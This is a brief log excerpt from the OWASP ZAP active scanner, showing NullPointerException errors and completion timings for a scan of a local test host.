[ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13495932 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13495932 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SlackerCookieDetector in 200.812s 13495932 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host http://172.17.0.2:8080 in 9598.615s 13495932 [Thread-65] INFO org.parosproxy.paros.core.scanner.Scanner - scanner completed in 9598.63s